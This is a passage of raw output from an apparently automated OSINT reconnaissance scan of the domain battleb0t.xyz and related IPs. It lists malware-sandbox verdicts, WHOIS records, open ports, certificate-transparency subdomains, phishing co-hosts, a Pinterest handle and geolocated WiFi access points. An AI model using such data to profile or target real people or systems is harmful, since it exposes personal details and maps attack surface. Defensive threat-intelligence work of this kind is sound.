u'Windows 7 64 bit', u'threat_score': 5, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'80a2803dcb7984c1fc706916af633fe3458beb922766fae4e23e3a768fda590a', u'type': None, u'type_short': u'url', u'size': 74}, {u'environment_id': 120, u'job_id': u'63867bb52e687907d6210c8b', u'analysis_start_time': u'2022-11-29 21:37:58', u'vx_family': u'Trojan.HTML.Hidden.1', u'av_detect': u'14', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'rfc822-email_part_001.html', u'sha256': u'5991841f0d0b33c05baeab2c866b87b0423a247614eafdffda112de9069a5548', u'type': None, u'type_short': u'html', u'size': 413}, {u'environment_id': 110, u'job_id': u'63764586f2ced261cb4247ec', u'analysis_start_time': u'2022-11-17 14:30:31', u'vx_family': u'Phishing site', u'av_detect': u'8', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 16, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'3f2afc09c8491cd0467de0bb1a0f40865550f686777efcbef22399d672572dce', u'type': None, u'type_short': u'url', u'size': 305}, {u'environment_id': 120, u'job_id': u'6369bb23c90e715df924df2e', u'analysis_start_time': u'2022-11-08 02:12:52', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'45b03fe4427c993fcd3fd86ea0653b0e7cc007e8ad65e31581e62132e63f1e14', u'type': None, u'type_short': u'url', u'size': 74}, {u'environment_id': 160, u'job_id': u'636281a88f64a063651ceaff', u'analysis_start_time': u'2022-11-02 14:41:45', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'61b1cc0537053e2876e4e2bd9e5bc874e980cda8bae7ae2039d9c02998a32562', u'type': None, u'type_short': u'url', u'size': 51}, {u'environment_id': 100, u'job_id': u'635882668f9ad024065477d8', u'analysis_start_time': u'2022-10-26 00:42:14', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'0d95c3235f13121a871148a672ac841f489584937622a18f2c4598bf58d8a241', u'type': None, u'type_short': u'url', u'size': 68}, {u'environment_id': 100, u'job_id': u'63564e6ace166b090d3c3045', u'analysis_start_time': u'2022-10-24 08:35:54', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'34d67fad8045f7de1db4f06d2b2051ca5e46fe962879b6e4d33e187924fe935b', u'type': None, u'type_short': u'url', u'size': 63}, {u'environment_id': 110, u'job_id': u'634a56d4b80c06008757bc41', u'analysis_start_time': u'2022-10-15 06:44:38', u'vx_family': u'Phishing site', u'av_detect': u'9', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 78, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'7213bd8277b28523618c1b5b6bf3f27ccc7dcd6693edba6a82e511aca4ad0e24', u'type': None, u'type_short': u'url', u'size': 51}, {u'environment_id': 100, u'job_id': u'63321bcac6ff822914185cf4', u'analysis_start_time': u'2022-09-26 21:38:19', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'e12119a3760db0872df94b860880bef1f07dcffdf3f3bfd3b8fa2d5179b773ce', u'type': None, u'type_short': u'url', u'size': 56}, {u'environment_id': 100, u'job_id': u'632b8d686a157c3383362586', u'analysis_start_time': u'2022-09-21 22:17:13', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 33, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'da3e56c906f9dc5bfb98ea2091bd2edd31013446f1b533613d7ab1544cb46867', u'type': None, u'type_short': u'url', u'size': 78}, {u'environment_id': 100, u'job_id': u'631e8a103ac2dd59e75bd028', u'analysis_start_time': u'2022-09-12 01:23:29', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'02b0ff140e8d110412dad713ea68a678d8f00d185e126dbaa968fc6da44e45d2', u'type': None, u'type_short': u'url', u'size': 76}, {u'environment_id': 100, u'job_id': u'630e944ecad9df06be085b88', u'analysis_start_time': u'2022-08-30 22:50:55', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'072e3ec83c217f53774393c7c55b71b6ac38b677006d238619898149b4ae8ff0', u'type': None, u'type_short': u'url', u'size': 76}, {u'environment_id': 100, u'job_id': u'62faf453f8181107c461186a', u'analysis_start_time': u'2022-08-16 01:35:15', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'fe2af1766084a7c48df58d7e964138220afabdf4abc0e7fb0d3a87ef13318110', u'type': None, u'type_short': u'url', u'size': 62}, {u'environment_id': 120, u'job_id': u'62ece8b3b10f5e5c39274ed4', u'analysis_start_time': u'2022-08-05 09:53:56', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'e18b01f7d649ef68ea6d24248ea0193fa5f0ac85cd0c1bef4112fcd824ca887e', u'type': None, u'type_short': u'url', u'size': 68}, {u'environment_id': 100, u'job_id': u'62e803d5a5a7870ff72f3cf6', u'analysis_start_time': u'2022-08-01 16:48:22', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'9e255d1be44c24749101e3045b28e8f610869aa0e61723e6d6d258da1b22475c', u'type': None, u'type_short': u'url', u'size': 97}]} | 104.196.30.220 |
| 2023-05-12 03:32:04 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.3:80 | 188.114.97.0/24 |
| 2023-05-12 03:23:13 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.2:80 | 188.114.96.0/24 |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 4 | 0 | None | CloudFlare, Inc. | Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2015-10-20T06:46:53Z
Creation Date: 2009-02-17T22:08:05Z
Registry Expiry Date: 2024-02-17T22:08:05Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.CLOUDFLARE.NET
Name Server: NS2.CLOUDFLARE.NET
Name Server: NS3.CLOUDFLARE.NET
Name Server: NS4.CLOUDFLARE.NET
Name Server: NS5.CLOUDFLARE.NET
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 90F710A107DA51ED78125D30A68704CF3C0308AFD01BFCD7057D4BD03B62C68B
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2022-03-16T19:39:08Z
Creation Date: 2009-02-17T22:08:05Z
Registrar Registration Expiration Date: 2024-02-17T22:08:05Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Name Server: ns1.cloudflare.net
Name Server: ns2.cloudflare.net
Name Server: ns3.cloudflare.net
Name Server: ns4.cloudflare.net
Name Server: ns5.cloudflare.net
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
| 2023-05-12 03:09:57 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.108 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2WIRE431 (Net ID: 00:02:2D:68:9D:A0) | 34.0544, -118.244 |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.121 | 35.229.48.116 |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.155): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:44 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["0"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "X_Nf_Request_Id": ["01H04J1V5ZEHVH006E5VV5HBN1"], "Date": ["<REDACTED>"], "Server": ["Netlify"]} | 35.229.48.116 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ballpark (Net ID: 00:02:2D:3D:74:62) | 37.7642, -122.3993 |
| 2023-05-12 03:00:51 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.75): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Equiscript (Net ID: 00:18:0A:6F:96:37) | 32.8608, -79.9746 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomCECF14 (Net ID: 00:0C:F6:CE:CF:14) | 50.8897, 6.0563 |
| 2023-05-12 03:18:46 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image ExifOffset': (0x8769) Long=90 @ 66, 'EXIF ComponentsConfiguration': (0x9101) Undefined=YCbCr @ 112, 'Image YCbCrPositioning': (0x0213) Short=Centered @ 54, 'Image XResolution': (0x011A) Ratio=72 @ 74, 'EXIF FlashPixVersion': (0xA000) Undefined=0100 @ 124, 'Image YResolution': (0x011B) Ratio=72 @ 82, 'EXIF ColorSpace': (0xA001) Short=sRGB @ 136, 'EXIF ExifImageLength': (0xA003) Long=3088 @ 160, 'EXIF ExifVersion': (0x9000) Undefined=0221 @ 100, 'Image ResolutionUnit': (0x0128) Short=Pixels/Inch @ 42, 'EXIF ExifImageWidth': (0xA002) Long=2316 @ 148, 'EXIF SceneCaptureType': (0xA406) Short=Standard @ 172} | https://pics.battleb0t.xyz/images/carti_3.JPG |
| 2023-05-12 03:21:08 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pinterest (Category: social)
https://www.pinterest.com/dawidsulej/ | dawidsulej |
| 2023-05-12 02:53:52 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8003::/48 | 2606:50c0:8003::153 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.213): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f6071cb5443bc-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:31:27 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | domains@hostex.lt | % Hello, this is the DOMREG whois service.
%
% By submitting a query you agree not to use the information made
% available to:
% - allow, enable or otherwise support the transmission of unsolicited,
% commercial advertising or other solicitations whether via email or
% otherwise;
% - target advertising in any possible way;
% - to cause nuisance in any possible way to the registrants by sending
% (whether by automated, electronic processes capable of enabling
% high volumes or other possible means) messages to them.
%
% Version 0.4
%
% For more information please visit https://whois.lt
%
Domain: 000.lt
Status: registered
Registered: 2022-10-11
Expires: 2023-10-12
%
Registrar: Telia Lietuva, AB
Registrar website: http://www.hostex.lt
Registrar email: domains@hostex.lt
%
Contact organization: Telia Lietuva, AB
Contact email: domains@hostex.lt
%
Nameserver: ns3.hostex.lt
Nameserver: ns4.hostex.lt
Nameserver: ns1.hostex.lt
Nameserver: ns2.hostex.lt
|
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.192): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pannet-24 (Net ID: 00:01:8E:DA:59:C4) | 37.780462,-122.390564 |
| 2023-05-12 03:01:46 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.255): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BBHWIRELESS (Net ID: 00:00:C5:D7:60:F4) | 41.8781, -87.6298 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00steveng.github.io]
https://www.openphish.com/feed.txt | 00steveng.github.io |
| 2023-05-12 03:23:13 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.2:443 | 188.114.96.0/24 |
| 2023-05-12 02:54:54 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2a06:98c1:3121::1:80 | 2a06:98c1:3121::1 |
| 2023-05-12 03:32:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.15:443 | 188.114.97.0/24 |
| 2023-05-12 03:08:45 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.210 | 104.196.30.220 |
| 2023-05-12 02:53:04 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | fluid.battleb0t.xyz |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["7c5818d4bebc22ee-ORD"]} | 188.114.97.1 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5221619826367a-FRA"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.168.252 |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:443 | 188.114.96.1 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PG Airnet (Net ID: 00:02:2D:27:B4:51) | 37.7642, -122.3993 |
| 2023-05-12 03:32:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.13:8443 | 188.114.97.0/24 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.241): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:13:02 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0.crimson-perch.github.io]
https://www.openphish.com/feed.txt | 0.crimson-perch.github.io |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:2095 | 172.67.168.252 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | onshome (Net ID: 00:0C:41:67:02:1F) | 39.0469, -77.4903 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES_RT-205 (Net ID: 00:12:BF:FD:D7:C4) | 40.2024, 29.0398 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | devolo-000B3BEA35D8 (Net ID: 00:0B:3B:EA:35:D8) | 50.8897, 6.0563 |
| 2023-05-12 02:44:31 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | portainer.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', 